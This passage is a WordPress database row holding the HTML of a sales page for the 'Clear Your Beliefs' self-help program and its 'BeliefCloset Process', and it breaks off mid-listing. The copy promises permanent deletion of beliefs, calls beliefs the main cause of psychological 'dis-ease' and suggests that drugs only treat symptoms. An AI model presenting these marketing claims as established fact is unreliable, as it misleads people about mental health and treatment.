(3816, 3149, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72841:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></center></h1>\n\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul>\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" 